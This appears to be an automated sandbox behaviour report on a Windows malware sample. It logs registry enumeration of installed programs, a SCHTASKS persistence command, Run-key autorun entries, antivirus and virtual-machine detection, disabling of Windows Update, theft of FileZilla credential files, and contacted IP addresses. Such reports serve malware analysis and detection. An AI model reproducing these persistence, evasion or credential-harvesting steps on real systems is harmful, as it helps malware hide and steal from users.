RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: Fontcore base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: Google Chrome base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: IE40 base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: IE4Data base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: IE5BAKEX base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: IEData base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: MobileOptionPack base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: SchedulingAgent base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: WIC base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: {90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: {90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: {90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: {90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: {90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: {90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: {90120000-001F-0409-0000-0000000FF1CE} base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: {90120000-001F-0412-0000-0000000FF1CE} base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: {90120000-0028-0412-0000-0000000FF1CE} base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: {90120000-002C-0412-0000-0000000FF1CE} base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: {90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: {90120000-0044-0412-0000-0000000FF1CE} base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: {90120000-006E-0409-0000-0000000FF1CE} base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: {90120000-006E-0412-0000-0000000FF1CE} base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: {90120000-00A1-0412-0000-0000000FF1CE} base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: {90120000-00BA-0409-0000-0000000FF1CE} base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: {90120000-0114-0412-0000-0000000FF1CE} base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: {d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1
RegOpenKeyExW July 24, 2023, 7:35 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW July 24, 2023, 7:35 a.m.	regkey_r: AddressBook base_handle: 0x000003d8 key_handle: 0x000003dc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW July 24, 2023, 7:35 a.m.	regkey_r: Connection Manager base_handle: 0x000003d8 key_handle: 0x000003dc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW July 24, 2023, 7:35 a.m.	regkey_r: DirectDrawEx base_handle: 0x000003d8 key_handle: 0x000003dc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW July 24, 2023, 7:35 a.m.	regkey_r: EditPlus base_handle: 0x000003d8 key_handle: 0x000003dc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW July 24, 2023, 7:35 a.m.	regkey_r: ENTERPRISE base_handle: 0x000003d8 key_handle: 0x000003dc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1
RegOpenKeyExW July 24, 2023, 7:35 a.m.	regkey_r: Fontcore base_handle: 0x000003d8 key_handle: 0x000003dc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW July 24, 2023, 7:35 a.m.	regkey_r: Google Chrome base_handle: 0x000003d8 key_handle: 0x000003dc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW July 24, 2023, 7:35 a.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x000003d8 key_handle: 0x000003dc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW July 24, 2023, 7:35 a.m.	regkey_r: IE40 base_handle: 0x000003d8 key_handle: 0x000003dc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW July 24, 2023, 7:35 a.m.	regkey_r: IE4Data base_handle: 0x000003d8 key_handle: 0x000003dc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	SELECT * FROM Win32_Processor

Communicates with host for which no DNS query was performed (4 events)

host	77.91.124.31
host	77.91.68.3
host	77.91.68.30
host	77.91.68.68

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Attempts to stop active services (2 events)

Time & API	Arguments	Status	Return	Repeated
ControlService July 24, 2023, 7:27 a.m.	service_handle: 0x000000001a80c8c0 service_name: None control_code: 1		0	0
ControlService July 24, 2023, 7:27 a.m.	service_handle: 0x000000001a80cb00 service_name: None control_code: 1		0	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation July 24, 2023, 7:34 a.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

A process attempted to delay the analysis task. (2 events)

description	danke.exe tried to sleep 157 seconds, actually delayed analysis time by 157 seconds
description	outsidevariety.exe tried to sleep 2728223 seconds, actually delayed analysis time by 2728223 seconds

Installs itself for autorun at Windows startup (13 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\foto135.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000038051\foto135.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fotod25.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000039051\fotod25.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\an.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000040051\an.exe
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP003.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP004.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP005.TMP\"
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F

Detects Avast Antivirus through the presence of a library (2 events)

Time & API	Arguments	Status	Return	Repeated
LdrGetDllHandle July 24, 2023, 7:34 a.m.	module_name: snxhk module_address: 0x00000000 stack_pivoted: 0		3221225781	0
LdrGetDllHandle July 24, 2023, 7:34 a.m.	module_name: snxhk module_address: 0x00000000 stack_pivoted: 0		3221225781	0

Attempts to disable Windows Auto Updates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Executes one or more WMI queries (8 events)

wmi	SELECT * FROM Win32_VideoController
wmi	SELECT * FROM AntivirusProduct
wmi	SELECT * FROM Win32_OperatingSystem
wmi	SELECT * FROM Win32_Process Where SessionId='1'
wmi	SELECT * FROM AntiSpyWareProduct
wmi	SELECT * FROM FirewallProduct
wmi	SELECT * FROM Win32_DiskDrive
wmi	SELECT * FROM Win32_Processor

Collects information about installed applications (50 out of 54 events)

Time & API	Arguments	Status
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
